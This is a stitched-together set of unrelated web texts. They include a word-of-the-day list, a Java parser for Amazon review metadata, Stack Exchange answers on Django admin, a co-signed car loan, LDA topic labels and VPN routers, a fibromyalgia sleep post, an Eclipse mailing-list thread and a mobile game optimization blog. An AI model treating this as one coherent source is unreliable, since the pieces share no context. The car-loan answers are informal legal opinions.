26th May, 2020 - zest - a piece of the peel of a citrus fruit (as an orange or lemon) used as flavoring (self.WordOfTheDay) submitted 6 days ago by lowlevelbassMedius Mod
25th May, 2020 - slumgullion - a meat stew (self.WordOfTheDay) submitted 7 days ago by lowlevelbassMedius Mod
22nd May, 2020 - anachronism - an error in chronology; especially: a chronological misplacing of persons, events, objects, or customs in regard to each other (self.WordOfTheDay) submitted 10 days ago by lowlevelbassMedius Mod
15th May, 2020 - higgledy-piggledy - in a confused, disordered, or random manner (self.WordOfTheDay) submitted 17 days ago by lowlevelbassMedius Mod
14th May, 2020 - muse - to become absorbed in thought; especially: to turn something over in the mind meditatively and often inconclusively (self.WordOfTheDay) submitted 18 days ago by lowlevelbassMedius Mod
8th May, 2020 - kakistocracy - government by the least suitable or competent citizens of a state (self.WordOfTheDay) submitted 24 days ago by lowlevelbassMedius Mod
7th May, 2020 - bowdlerize - to expurgate (as a book) by omitting or modifying parts considered vulgar (self.WordOfTheDay) submitted 25 days ago by lowlevelbassMedius Mod
1st May,
2020 - famish - to cause to suffer severely from hunger (self.WordOfTheDay) submitted 1 month ago by lowlevelbassMedius Mod
30th April, 2020 - sward - a portion of ground covered with grass (self.WordOfTheDay)
24th April, 2020 - brachiate - to progress by swinging from hold to hold by the arms (self.WordOfTheDay)
23rd April, 2020 - semelparous - reproducing or breeding only once in a lifetime (self.WordOfTheDay)
22nd April, 2020 - cognize - \käg-ˈnīz\ - to know or perceive; to recognize (self.WordOfTheDay) submitted 1 month ago by _wsgeorge
17th April, 2020 - incisive - impressively direct and decisive (as in manner or presentation) (self.WordOfTheDay)
16th April, 2020 - malapert - impudently bold (self.WordOfTheDay)
15th April, 2020 - poultice - \ˈpōl-təs\ - a soft usually heated and sometimes medicated mass spread on cloth and applied to sores (self.WordOfTheDay)
10th April, 2020 - weald - a heavily wooded area (self.WordOfTheDay)
9th April, 2020 - maundy - \ˈmȯndē , ˈmän- , -di\ - a commandment (self.WordOfTheDay)
8th April, 2020 - detente - \dā-ˈtänt\ - the relaxation of strained relations or tensions (as between nations) (self.WordOfTheDay)
6th April, 2020 - bumfuzzle - \ ¦bəm¦fəzəl \ - confuse, perplex, or fluster (self.WordOfTheDay) submitted 1 month ago by wrightentertainmentPulchritudinous Mod
4th April, 2020 - recidivism - a tendency to relapse into a previous condition or mode of behavior; especially: relapse into criminal behavior (self.WordOfTheDay)
3rd April, 2020 - avuncular - \ə-ˈvəŋ-kyə-lər\ - someone who is kind and patient and generally indulgent with younger people (self.WordOfTheDay)
2nd April, 2020 - polliwog - \ˈpä-lē-ˌwäg, -ˌwȯg\ - tadpole (self.WordOfTheDay) submitted 2 months ago by _wsgeorge
1st April, 2020 - collywobbles - \kä-lē-ˌwä-bəlz\ - pain in the stomach or bowels (self.WordOfTheDay)
/*******************************************************************************
 * Original Author: Pratima Kshetry
 *
 * This parser is meant to parse the Amazon meta data set available at
 * http://snap.stanford.edu/data/amazon-meta.html
 *
 * Sample record:
 *
 *   Id: 1
 *   ASIN: 0827229534
 *   title: Patterns of Preaching: A Sermon Sampler
 *   group: Book
 *   salesrank: 396585
 *   similar: 5 0804215715 156101074X 0687023955 0687074231 082721619X
 *   categories: 2
 *     |Books[283155]|Subjects[1000]|Religion & Spirituality[22]|Christianity[12290]|Clergy[12360]|Preaching[12368]
 *     |Books[283155]|Subjects[1000]|Religion & Spirituality[22]|Christianity[12290]|Clergy[12360]|Sermons[12370]
 *   reviews: total: 2  downloaded: 2  avg rating: 5
 *     2000-7-28  cutomer: A2JW67OY8U6HHK  rating: 5  votes: 10  helpful: 9
 *     2003-12-14 cutomer: A2VE83MZF98ITY  rating: 5  votes:  6  helpful: 5
 *
 * Note: "cutomer" is the data set's own (misspelled) field label, so the
 * parser matches it literally.
 ******************************************************************************/
import java.io.BufferedReader;
import java.io.FileInputStream;
import java.io.IOException;
import java.io.InputStreamReader;
import java.util.HashMap;
import java.util.Map;

public class AmazonDataParser {
    private BufferedReader reader = null;
    private String inputLine = null;
    private String filePath = null;
    // AmazonCustomerProfile and AmazonProductProfile are defined elsewhere
    // in this project.
    private Map<String, AmazonCustomerProfile> customerProfiles = null;
    private String currentProductID = null;
    private String currentProductTitle = null;

    public AmazonDataParser(String filePath) {
        this.filePath = filePath;
        this.customerProfiles = new HashMap<String, AmazonCustomerProfile>();
    }

    public void parse() {
        try {
            if (reader != null) {
                reader.close();
            }
            reader = new BufferedReader(
                    new InputStreamReader(new FileInputStream(filePath)), 1024 * 100);
            inputLine = reader.readLine();
            while (inputLine != null) {
                if (inputLine.startsWith("Id:")) {
                    this.currentProductID = extractProductID(inputLine);
                    inputLine = processInputLines(reader);
                } else {
                    inputLine = reader.readLine();
                }
            }
        } catch (Exception e) {
            e.printStackTrace();
        } finally {
            try {
                if (reader != null) {
                    reader.close();
                }
            } catch (Exception e) {
                e.printStackTrace();
            }
        }
    }

    // Consumes all lines belonging to the current record and returns the
    // first line of the next record (or null at end of file).
    private String processInputLines(BufferedReader reader) throws IOException {
        String line = reader.readLine();
        System.out.println("\n****[Start]*****");
        while (line != null && !line.startsWith("Id:")) {
            System.out.println(line);
            parseLine(line); // parses each line and updates customer profiles
            line = reader.readLine();
        }
        System.out.println("\n****[END]****");
        return line;
    }

    private void parseLine(String input) {
        input = input.trim();
        if (input.startsWith("title:")) {
            this.currentProductTitle = extractProductTitle(input);
        }
        if (input.contains("cutomer:")) {
            extractCustomerProfile(input);
        }
    }

    private String extractProductID(String input) {
        String extractedText = null;
        if (input != null && input.startsWith("Id:")) {
            int pos = input.indexOf(':');
            extractedText = input.substring(pos + 1).trim();
        }
        return extractedText;
    }

    private String extractProductTitle(String input) {
        if (input == null) {
            return null;
        }
        input = input.trim();
        String extractedText = null;
        if (input.startsWith("title:")) {
            int pos = input.indexOf(':');
            extractedText = input.substring(pos + 1).trim();
        }
        return extractedText;
    }

    private AmazonCustomerProfile extractCustomerProfile(String input) {
        AmazonCustomerProfile custProfile = null;
        if (input != null) {
            input = input.trim();
            if (input.contains("cutomer:")) {
                // Splitting on the field labels turns a review line such as
                // "2000-7-28 cutomer: A2JW67OY8U6HHK rating: 5 votes: 10 helpful: 9"
                // into 5 fields: "", customer ID, rating, votes, helpful.
                String[] splitString =
                        input.split(".*cutomer:|\\s+rating:|\\s+votes:|\\s+helpful:");
                // The split must yield exactly 5 fields for a valid review line.
                if (splitString.length == 5) {
                    String customerID = splitString[1].trim();
                    if (customerProfiles.containsKey(customerID)) {
                        custProfile = customerProfiles.get(customerID);
                    } else {
                        custProfile = new AmazonCustomerProfile(customerID);
                        customerProfiles.put(customerID, custProfile);
                    }
                    AmazonProductProfile product = new AmazonProductProfile();
                    product.ID = currentProductID;
                    product.Title = currentProductTitle;
                    try {
                        product.Rating = Integer.parseInt(splitString[2].trim());
                    } catch (Exception e) {
                        product.Rating = -1; // malformed rating field
                    }
                    custProfile.AddProductProfile(product);
                }
            }
        }
        return custProfile;
    }

    public void printCustomersProfile() {
        for (String key : customerProfiles.keySet()) {
            System.out.println(customerProfiles.get(key).toString());
        }
    }
}
Restrictive selection in django-admin panel

I have 3 simple models in my Django project, as below:

class Customer(models.Model):
    name = models.CharField(max_length=250)

class Location(models.Model):
    name = models.CharField(max_length=500)
    customer = models.ForeignKey(Customer)

class CustomerLocation(models.Model):
    name = models.CharField(max_length=250)
    customer = models.ForeignKey(Customer)
    location = models.ForeignKey(Location)

Now, I want to display the list of location(s) linked to a Customer in CustomerLocation in the admin panel. For example: Customer = C1, Locations for C1 = L1, L2. Customer = C2, Location for C2 = L3. If I select C1 as my Customer, I should be able to choose only L1, L2 in Location. Otherwise, it should be empty. How can I achieve this restriction in the Django admin? PS: I want to achieve this via models.Admin only.

There is a pluggable Django app for that: https://github.com/digi604/django-smart-selects You just add a field:

location = ChainedForeignKey(
    'Location',
    chained_field='customer',
    chained_model_field='customer',
    auto_choose=True,
    null=True,
    blank=True,
)

(Not tested, but should work.) And in the Django admin, if you change Customer, the Locations list changes accordingly.

UPD. Hm, it appears that I didn't understand your question properly. What do you need the customer field in your Location model for? As far as I can see, CustomerLocation is responsible for linking these two models with one another, and every Customer may thus be linked to multiple Locations. You could achieve this with a ManyToManyField more easily, by the way. Why do you need to display customers and locations at CustomerLocation? You can probably use Django admin filters for that. For example:

class CustomerLocationAdmin(admin.ModelAdmin):
    list_display = ('customer', 'location')
    list_filter = ('location', 'customer')

admin.site.register(CustomerLocation, CustomerLocationAdmin)

Then, you get: a list of customers and locations, and two dropdowns for customer and location.
You select a particular customer or a particular location to get the necessary data. Will this solution work for you?

Thank you. But is there a way via the queryset option in my models.Admin class? That would keep the display within the admin itself. What I need is restrictive selection in Location (during creating/updating), like what django-smart-selects achieves. I want it to appear via the models.Admin class only.

In other words, when editing a Location, its customer field should display a list of those customers who are linked to this particular Location instance with a CustomerLocation instance, right?

Hehe.. The exact opposite of what you mentioned should happen! :D It should display a list of Locations for a selected Customer! You can see that Location is already mapped to Customer as a ForeignKey field.

Hm, so, finally: you want to see a list of affiliated Locations while editing a Customer? And be able to edit/delete them?
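For the "via ModelAdmin only" part of the question: Django's ModelAdmin exposes a `formfield_for_foreignkey` hook that lets you restrict a dropdown's queryset without a third-party app. A sketch under the models above (untested here; it filters only when editing an existing CustomerLocation, since on the add form no Customer has been chosen yet, and reacting live to the Customer dropdown still needs JavaScript, which is what django-smart-selects provides). The `object_id` lookup assumes recent Django admin URL patterns:

```python
# Sketch only: assumes the Customer/Location/CustomerLocation models from
# the question are importable from this app's models module.
from django.contrib import admin
from .models import CustomerLocation, Location

class CustomerLocationAdmin(admin.ModelAdmin):
    def formfield_for_foreignkey(self, db_field, request, **kwargs):
        if db_field.name == "location":
            # On the change form, the admin URL carries the object's pk;
            # use it to limit Location choices to that object's Customer.
            object_id = request.resolver_match.kwargs.get("object_id")
            if object_id:
                obj = CustomerLocation.objects.get(pk=object_id)
                kwargs["queryset"] = Location.objects.filter(customer=obj.customer)
        return super().formfield_for_foreignkey(db_field, request, **kwargs)

admin.site.register(CustomerLocation, CustomerLocationAdmin)
```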
I had a friend co-sign for a car loan

I have a real problem here: my friend at the time helped me by co-signing for a car loan. I want to take him off my title and loan. I just got the car 3 months ago. What do I do? He keeps threatening to take the car.

Why does he threaten to take the car? Has the relationship changed? Are you not making the payments, and is the lender going after your friend for the missed payments? Co-signing the loan puts him at risk. Having his name on the title puts you at risk. To take him off the loan, you will need to refinance into a new loan based entirely on your own credit. To take him off the title, you need his cooperation; he needs to agree to transfer his partial ownership of the car to you. Or you need to take him to court, but I'm not convinced you could win such a case.

See past answers regarding co-signing loans. This is a high-risk practice and should be avoided unless the co-signer is willing to risk losing their money. Doing this for a friend is a great way to destroy a friendship. If he is on the title, you legally share ownership of the car with him. You need to ask a lawyer to find out whether that gives him the right to take it. If it does, it probably also gives you the right to take it back... but you really, really don't want to get into that kind of battle.

What kind of lawyer would I call? A consumer lawyer?

If you needed a cosigner 3 months ago, why do you think you can get your own loan now?

The OP might be willing to pay a higher interest rate now that they understand that borrowing from a friend has its own risks. Or might not...

To answer your question: just because he's a co-signer doesn't give him the legal right to just take the car from you, as long as you can demonstrate you've been making the payments as agreed and are being responsible for the car and its maintenance. Several people have noted that he is a co-owner with you, which is true, but he doesn't have more rights to the car than you.
If it was agreed that his only role in the transaction was to be the guarantor of the debt then that's the only actionable claim he'd have -- that somehow you've breached the terms of the loan and he needs to secure possession of the vehicle to protect his legal and financial interests. Several people have noted you'd need to refinance the loan in order to remove him from it, but as also noted, he's on the title, so he'd have to agree to sign away his ownership. On the flip side, why not offer to let him take over the payments and the vehicle and you can step clear of the whole mess? It might be the wiser choice in the end. Unless the agreement was on paper -- which I doubt given the question -- it isn't clear who can or can't do what. Lawyer needed. Good point, Keshlam. I agree that a lawyer really would be the best option in this situation, and I would hope that one or both parties here have some kind of written agreement on this or it'll turn into a real mess. In my experience, people who ask this sort of question do so because they didn't have adequate legal advice when they established the co-signing/shared-title relationship. I could be wrong.
STACK_EXCHANGE
Naming LDA topics in Python I am new to Python and trying to implement topic modelling. I have successfully implemented LDA in Python using gensim, but I am not able to give any label/name to these topics. How do we name these topics? Please help out with the best way to implement this in Python. My LDA output is somewhat like this (please let me know if you need the code):
0.024*research + 0.021*students + 0.019*conference + 0.019*chi + 0.017*field + 0.014*work + 0.013*student + 0.013*hci + 0.013*group + 0.013*researchers
0.047*research + 0.034*students + 0.020*ustars + 0.018*underrepresented + 0.017*participants + 0.012*researchers + 0.012*mathematics + 0.012*graduate + 0.012*mathematical + 0.012*conference
0.027*students + 0.026*research + 0.018*conference + 0.017*field + 0.015*new + 0.014*participants + 0.013*chi + 0.012*robotics + 0.010*researchers + 0.010*student
0.023*students + 0.019*robotics + 0.018*conference + 0.017*international + 0.016*interact + 0.016*new + 0.016*ph.d. + 0.016*meet + 0.016*ieee + 0.015*u.s.
0.033*research + 0.030*flow + 0.028*field + 0.023*visualization + 0.020*challenges + 0.017*students + 0.015*project + 0.013*shape + 0.013*visual + 0.012*data
0.044*research + 0.020*mathematics + 0.017*program + 0.014*june + 0.014*conference + 0.014*- + 0.013*mathematicians + 0.013*conferences + 0.011*field + 0.011*mrc
0.023*research + 0.021*students + 0.015*field + 0.014*hovering + 0.014*mechanisms + 0.014*dpiv + 0.013*aerodynamic + 0.012*unsteady + 0.012*conference + 0.012*hummingbirds
0.031*research + 0.018*mathematics + 0.016*program + 0.014*flow + 0.014*mathematicians + 0.012*conferences + 0.011*field + 0.011*june + 0.010*visualization + 0.010*communities
0.028*students + 0.028*research + 0.018*ustars + 0.018*mathematics + 0.015*underrepresented + 0.010*program + 0.010*encouraging + 0.010*'', + 0.010*participants + 0.010*conference
0.049*research + 0.021*conference + 0.021*program + 0.020*mathematics + 0.014*mathematicians + 0.013*field + 0.013*- + 0.011*conferences + 0.010*areas
Labeling topics is completely distinct from topic modeling. Here's an article that describes using a keyword extraction technique (KERA) to apply meaningful labels to topics: http://arxiv.org/abs/1308.2359
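One quick-and-dirty approach, short of a technique like KERA, is to label each topic with its highest-weight words. A minimal sketch is below; the parser assumes gensim's "weight*word + ..." string format shown in the question, and `label_topic` is a made-up helper, not a gensim function:

```python
def label_topic(topic_string, n=3):
    """Parse 'weight*word + ...' pairs and return the top-n words joined as a label."""
    pairs = []
    for term in topic_string.split("+"):
        weight, _, word = term.strip().partition("*")
        pairs.append((float(weight), word.strip()))
    pairs.sort(reverse=True)  # highest weight first
    return "/".join(word for _, word in pairs[:n])

topic = "0.024*research + 0.021*students + 0.019*conference"
print(label_topic(topic))  # -> research/students/conference
```

Such labels are only as meaningful as the top words themselves; for human-readable names you would still curate them by hand or use a keyword-extraction method like the one in the linked paper.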
STACK_EXCHANGE
Permanent SSH (or VPN) tunnel for home office via dedicated device I will soon switch to working from a home office. At home I will have fast internet and a Fritz!Box DSL router. I will have a private PC, a company PC, and a company network phone at home (and maybe additional work-related devices). The company runs Linux servers. The private PC is connected to my other private devices using a private local network, and it is connected to the internet via the Fritz!Box. Now I want to transparently and permanently include my company PC and company phone in the company network. There should be no link between the private network and the company network. I think some persistent SSH tunnel or maybe a persistent VPN connection could be the way to go. I would like to avoid using tunneling software on the company PC, since I want to be able to simply plug additional devices into the company network without having to power on the company PC. Is there some kind of dedicated device that I can plug into my DSL router that provides a persistent (!) and stable (!) SSH/VPN tunnel to the company network? Maybe some router that remote-extends the company network via SSH/VPN? Reliability is most important. Of course I would like to avoid spending too much money. (I tried to search the web for this, but all I found were routers that work as SSH/VPN servers; however, I need an SSH/VPN client.) In Windows, in Control Panel > Network and Sharing Center, you can set up a new connection or network. This is a VPN; the option is called "Connect to a workplace". Not sure if you mean something like this. Not exactly. I would like to use a dedicated device so I can use the company network without powering on the PC. Apart from that, I will need to use a Linux desktop. Oh okay, so if I understand right, you want to have a PC turned on at your work and connect to it using an application like Remote Desktop or TeamViewer? If you have any old PC (with a 500 MHz CPU and 256 MB RAM or better,
or you can get some certified devices here), then you can set up pfSense as a firewall/router (and a bunch of other stuff) acting as a VPN client to your workplace. You would need two network cards: one for the WAN and another for a LAN that will be dedicated to the work PC and phone. Use the step-by-step documentation in the "Client Settings" section of the official documentation on how to set up a site-to-site OpenVPN channel. One thing: if you need broadcast support between your home and office, use a tap instead of a tun interface. It is more chatty, but if you have reliable high-speed internet it won't be an issue. You didn't say what exact VPN type is supported at your office. Is it OpenVPN, IPsec, PPTP, L2TP...? If you still prefer a "ready to go" VPN solution in a box from the big vendors, you may take a look at Cisco products. One very common solution is the Cisco RV215W. (Or check the list of Cisco's most common SOHO solutions here.) This box supports IPsec tunnels, L2TP, and PPTP (I strongly discourage you from using that last one). IPsec will require you to have a static IP on both sides, though. As for an SSH tunnel, it is usually managed on a client PC, not on a router. I will check out those devices. The PC solution seems to require too many resources. I wonder why there aren't a lot more routers with integrated VPN clients or SSH tunnels. Shouldn't all remote workers need something like that?! @Silicomancer I don't think the PC solution will require a lot of resources; you can get any Pentium 3/4 off eBay for 25-30 bucks, and with pfSense you will get much more than any "ready" solution. Plus it is well supported, and vulnerability patches are applied much faster than by any other router maker. It has a nice web interface, the same as the consumer-"friendly" boxes. The VPN type is not decided yet. It may depend on the client, and maybe on what the company's Linux servers support best. Surely not PPTP, since it must be secure. So there are no SSH-tunneling routers for that purpose? What a pity.
My boss would have been excited :-) @Silicomancer SSH tunneling isn't an industry standard because it is a very flexible solution that wouldn't fit everyone's needs, and it requires a good networking background from clients. I suggest you use OpenVPN: a secure and reliable solution, proven over time. I have also heard only good things about OpenVPN. But this excludes the Cisco router, right? It drives me nuts... how do I know if a device is suited to my scenario? There are a lot of "VPN routers" out there, but it is hard to find out whether they are VPN servers (for use in the company network) or VPN clients (for use in a home office). Servers seem to be more common. Are there any technical keywords I should look for? Cisco's RV320 supports OpenVPN.
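For reference, a minimal OpenVPN client configuration for such a site-to-site setup might look like the sketch below. The hostname, port, and certificate file names are placeholders, not values from this thread; the actual settings come from the company's OpenVPN server, and the official pfSense/OpenVPN "Client Settings" documentation remains the authoritative guide:

```conf
# Minimal OpenVPN client sketch for a home-office box (e.g. pfSense).
# vpn.example.com, the port, and the certificate paths are placeholders.
client
dev tap            # "dev tun" if broadcast between the sites is not needed
proto udp
remote vpn.example.com 1194
persist-key
persist-tun
ca ca.crt
cert home-office.crt
key home-office.key
keepalive 10 60    # ping every 10 s, restart the tunnel after 60 s of silence
verb 3
```

The `keepalive` and `persist-*` directives are what make the tunnel self-healing, which matters most for the "persistent (!) and stable (!)" requirement.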
STACK_EXCHANGE
As I told you before, there are multiple ways to read a file in Java, e.g. FileReader, BufferedReader, and FileInputStream. You choose a Reader or an InputStream depending upon whether you are reading text data or binary data; for example, the BufferedReader class is mostly used to read a text file in Java. The Scanner class is another way to read a text file in Java. Even though Scanner is more popular as a utility to read user input from the command prompt, you will be glad to know that you can also read a file using Scanner. Similar to BufferedReader, it provides buffering, but with a smaller buffer size of 1KB, and you can also use the Scanner to read a file line by line in Java. Similar to readLine(), the Scanner class has a nextLine() method which returns the next line of the file. Scanner also provides parsing functionality: you can not only read text but parse it into the correct data type, e.g. nextInt() can read an integer, nextFloat() can read a float, and so on. Though all three are ranking functions in SQL, also known as window functions in Microsoft SQL Server, the difference between rank(), dense_rank(), and row_number() appears when you have ties in the ranking, i.e. duplicate records. For example, if you are ranking employees by their salaries, then what would be the rank of two employees with the same salary? It depends upon which ranking function you are using, e.g. row_number, rank, or dense_rank. The row_number() function always generates a unique ranking even with duplicate records: if the ORDER BY clause cannot distinguish between two rows, it will still give them different rankings, though which record comes earlier or later is decided arbitrarily. In our example, two employees, Shane and Rick, have the same salary and have row numbers 4 and 5; this is arbitrary, and if you run it again, Shane might come 5th. This week's programming exercise is to write a Java program to calculate the GCF and LCM of two numbers.
GCF stands for Greatest Common Factor and LCM stands for Lowest Common Multiple; both are popular mathematical operations and are related to each other. The GCF is the largest number which divides both numbers without leaving any remainder; e.g. if the two numbers are 24 and 40, then their GCF is 8, because 8 is the largest number which divides both 24 and 40 perfectly, without leaving any remainder. Similarly, the LCM is the lowest number which is perfectly divisible by both numbers; for example, if the given numbers are 40 and 24, then their LCM is 120, because 120 is the lowest number which is perfectly divisible by both 40 and 24.
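As a sketch of the exercise described above (the class and method names are my own), the GCF can be computed with Euclid's algorithm, and the LCM derived from it via the identity lcm(a, b) = a / gcf(a, b) * b:

```java
// Sketch of the GCF/LCM exercise: GCF via Euclid's algorithm,
// LCM via the identity lcm(a, b) = a / gcf(a, b) * b.
public class GcfLcm {
    static int gcf(int a, int b) {
        while (b != 0) {          // Euclid: replace (a, b) with (b, a mod b)
            int t = b;
            b = a % b;
            a = t;
        }
        return a;
    }

    static int lcm(int a, int b) {
        return a / gcf(a, b) * b; // divide first to reduce overflow risk
    }

    public static void main(String[] args) {
        System.out.println("GCF(24, 40) = " + gcf(24, 40)); // 8
        System.out.println("LCM(24, 40) = " + lcm(24, 40)); // 120
    }
}
```

Running it on the example numbers from the text prints a GCF of 8 and an LCM of 120, matching the worked example above.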
OPCFW_CODE
Hello there, I am 18 and I have suffered from Fibromyalgia since I was 15. The pain and sleep issues forced me to leave school. I had a few questions about sleep relating to Fibromyalgia and about how Zeo could work for me. It's a bit long, but I am desperate for some answers. Thanks very much in advance to anyone who takes the time to read this. Here are some facts about my sleep: I sleep anywhere from 11-15 hours a night (I say night, but it is usually light out when I sleep). Usually it is 12 hours. My sleep is completely backwards; my days are at night and I sleep all day. And sometimes my day is when it is light out, but it doesn't last long. I used to be able to "push it" or force a regular sleep schedule for a night if I had to go somewhere the next day (if I had a few days to get my sleep on track), but I can't anymore. I'm always tired. I used to have 22-hour days and would experience strange "highs" of energy in my "evenings". Then I would sleep for 18 hours. Lately I only have 13-14 hour days, while sleeping for 11-15 hours nightly. I recently started weaning off a synthetic opioid painkiller called Tramadol/Ultram and went through horrible withdrawal, which may be why my sleep has changed. I also have sleep paralysis when waking and falling asleep from time to time. Other stuff you probably don't want to know :) I had a test done to check my cortisol levels and they were completely backwards, with a big spike about 2 hours before I would sleep. My hormones are also completely off in every respect. I don't know the details of the hormone test, but my doctor said she had never seen a test so backwards before. My serotonin is very low, also adding to the crappy withdrawal I had with Tramadol. I can't take an SSRI; I've had horrible experiences with them. I've done all the common things doctors have told me, like no TV, showers, a good bed, temperature, darkness. I've tried Paul McKenna's system. I've tried things like Ambien (worst decision ever).
Tylenol PM just makes me go to sleep faster, which isn't my issue. I can fall asleep fine. Plus any sleep aid causes me to have sleep paralysis. Nothing makes my sleep feel like I actually slept. I just feel like I've been unconscious but not "sleeping", if that makes any sense. I don't recall waking at all during the night though. Annyyywayy, I just wondered if anyone could tell me what I am missing. Something must be causing this, and my current doctor is at quite a loss to explain it. I also wondered if Zeo would be a good way to monitor my sleep, even though I sleep for so long. Would that screw with the ZQ? Or can I still use it? And if I can use it, how would knowing my ZQ benefit me?
OPCFW_CODE
LASERJET 4P DRIVER INFO:
|File Size:||4.6 MB|
|Supported systems:||Windows 10, 8.1, 8, 7, 2008, Vista, 2003, XP, Other|
|Price:||Free* (*Free Registration Required)|
LASERJET 4P DRIVER (laserjet_4p_2263.zip)
The HP LaserJet was the world's first desktop laser printer. The HP LaserJet 4P printer is the follow-on to the HP LaserJet IIIP printer, and the HP LaserJet 4MP printer is the multi-platform PostScript version of the 4P. PCL operation and the internal fonts in these two printers are identical to those of the HP LaserJet 4ML printer. As of 2016, Canon supplies both mechanisms and cartridges for all of HP's laser printers. Workteams excel with HP's black-and-white office LaserJet printers, which pack extra punch with high-quality results, extra power, and more features.
Download the latest drivers, firmware, and software for your HP LaserJet 4P/MP printer from HP's official website, which will help automatically detect and download the correct drivers free of cost for Windows and Mac operating systems. After unpacking the printer, complete the steps in the checklist in order. In order to create a PDP (printer driver profile), you must be using the version of the operating system for which you are creating the driver profile. In other words, if you are setting up a PDP for the Windows 2000 drivers for a LaserJet 5, you must be on a Windows 2000 box when setting them up.
PCL 5 LaserJet printers allow you to specify complex structures (contours, outlines, shading, etc.) and widths as well as posture; refer to the HP PCL 5 Printer Language Technical Reference Manual, available from Hewlett-Packard. The configuration page on the 4, 4P, or 4 Plus is called the self-test page, but it will still list the page count and settings that a standard configuration page would show. Nearly every time, a jamming HP LaserJet is caused by worn pickup rollers; replacing them should be the first port of call.
On Linux, I chose LaserJet 4 as the model and selected "hp laserjet 4 cups + gutenprint v5.2.6 simplified (en)", the recommended driver. Printing a test page produced infinite copies; I had to shut the printer off and clear the resulting paper jam. Although it is an HP LaserJet 4 Plus, that appears to be not so important, other than the fact that the original cable has been replaced with one with a USB connector for my more modern laptop. The HP Linux Imaging and Printing system (HPLIP) is an HP-developed solution for printing, scanning, and faxing with HP inkjet and laser-based printers in Linux. The cooperatively maintained Printing HOWTO printer database aims to be a comprehensive listing of the state of GNU/Linux printer support. There is no Linux driver for the plain LaserJet 4 model, but experimentation shows that it works great with Optra E+ drivers. For over a decade there were absolutely no issues with Linux and my HP LaserJet 4P.
When I tried to install the driver for my LaserJet 4, Windows complained that there was no appropriate driver. I've been trying unsuccessfully to find a printer driver for my LaserJet 4 printer (not 4P, 4M, 4 Plus, etc., just a plain LaserJet 4) that will install on a Windows 10 64-bit Professional machine. @dsherman, have you tried going to the Microsoft Update Catalog website with Internet Explorer? I rebuilt one of my systems; because it has 16GB of RAM, I needed to install 64-bit Windows 8.1.
I have an HP LaserJet 4P printer hooked up to the computer through a serial port. My printer has suddenly started to cut off words on the right and left side. If I print more than one page, it all prints on one page. The printer is an HP LaserJet 3 with a PostScript cartridge in it; when I read the manual, it said that I should just set this up as a PostScript printer. Well, I did, and it works most of the time.
I have a LAN with Windows and Linux (Fedora 6) machines, an old HP LaserJet 4P, and a Linksys print server; the HP4 has a PostScript cartridge. This thread is inspiring; I too have a LaserJet 4P. Enter your HP printer model and we'll get you the right printer setup software and drivers.
OPCFW_CODE
|RE: [p2-dev] The future of Eclipse upgrades| Yes, this is a great point. I think you need to always treat Windows Vista/7 installs as shared installs, at least if you install them into Program Files, which you should do to take advantage of the security mechanisms there. That would mean running Eclipse as Admin when you want to install, or introducing a new exe that has the Administrator privileges set in the exe's manifest. You may be able to elevate your privileges at run time, but I'm not sure what the API for that would be. And you are also correct that Windows users won't perceive what is happening. This is a general problem with the shared install scenario. It's hard to know where the plug-ins you are installing end up. I've seen users accidentally delete them when cleaning up their file system. I'll have to check if there's anything in Bugzilla about that. From: p2-dev-bounces@xxxxxxxxxxx [mailto:p2-dev-bounces@xxxxxxxxxxx] On Behalf Of Ian Bull I had the pleasure of running Eclipse on Windows 7, and the Eclipse upgrade story concerns me a bit. On Windows 7 (and maybe Vista, I'm not sure), I was able to unzip an Eclipse install into the Program Files directory and launch it. While this directory was writable by the unzip utility, it's not writable by Eclipse, and we are put into a shared install mode. For the most part this works fine; however, we won't be able to upgrade (using p2) when SR1 comes out. Eclipse has been designed so that you can install new plugins in a shared install, but you cannot upgrade the base (without becoming a super user). Technically this is no different from *nix environments; however, I would argue that there is a perceived difference. 1. You never had to become a super user before (Windows XP). 2. And more importantly, you could 'install' Eclipse without becoming a super user, so why do I need to become an SU to upgrade? I'm not even sure how to become a super user on Windows.
There are a number of bugs related to Eclipse and Windows 7, but most of these appear to be related to installing new plugins. The bugs don't concern me (too much), but the more general decision not to allow upgrades to the base seems like it will have serious consequences. This obviously isn't just an Eclipse problem, but an RCP problem too. What do others think? I'm not a regular Windows user, so maybe this isn't really a problem. Would Windows users expect to launch Eclipse in SU mode to upgrade it? Is there a way to put a p2 agent in SU mode (or at least bring up one of those helpful warnings when we upgrade: "The Eclipse process is trying to write to the Program Files directory. Are you really really really sure you want to allow this?")? Is this something that we should be thinking about for our Indigo plan?
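The manifest route mentioned earlier in the thread can be sketched as a generic Win32 application manifest fragment (this is my own illustrative sketch using Microsoft's standard manifest schema, not something from the Eclipse source tree); UAC reads `requestedExecutionLevel` and shows the elevation prompt before the exe starts:

```xml
<!-- Sketch: application manifest requesting elevation on Windows Vista/7. -->
<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0">
  <trustInfo xmlns="urn:schemas-microsoft-com:asm.v3">
    <security>
      <requestedPrivileges>
        <!-- "asInvoker" would run with the caller's rights; "requireAdministrator"
             forces the UAC elevation prompt at launch. -->
        <requestedExecutionLevel level="requireAdministrator" uiAccess="false"/>
      </requestedPrivileges>
    </security>
  </trustInfo>
</assembly>
```

A dedicated updater exe with this manifest would let the main Eclipse exe stay unelevated, which matches the "introduce a new exe" suggestion above.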
OPCFW_CODE
About a month ago I wrote an article about the optimizations I did on Wisps in order to get it to run decently on lower-end machines. This time I want to focus on the optimizations I had to do on top of the previous ones in order to get the game running on Android. Unfortunately I wasn't able to get the game running decently on devices older than the Snapdragon S2, but it was still a nice experience to have. (By the way, you can get the Android version for FREE). My main objective during this optimization process was getting the number of triangles and draw calls to a minimum, while still keeping the polished aspect of the game. In order to reduce the triangle count I had to simplify the trees, because any triangle saved on one tree could lead to a few hundred saved each frame. The step I took was to remove the trunks of the trees, which saved about 6 triangles per tree, reducing the triangle count quite a lot. What I should have done to optimize it even more would have been to render each tree from above and make it exactly 2 triangles, but that would have been a bit too much work given there are a lot of tree types. I also reduced shader complexity by dumping the custom "glowing" shader and replacing it with a standard mobile alpha-test shader that came with Unity. I decreased the terrain quality even further; only a few triangles are now used to render it. I now think a better solution would have been to ditch the terrain entirely and use a single big quad to render it. Textures were downsized to the minimum size possible without damaging the visuals too much. This was a requirement because I had some game crashes when textures that were too big were being used. Unfortunately this had a negative impact on the tutorial textures, making the text harder to read. Hiding tree trunks and reducing terrain quality made it a requirement to ditch the perspective camera in favor of an orthographic top-down camera.
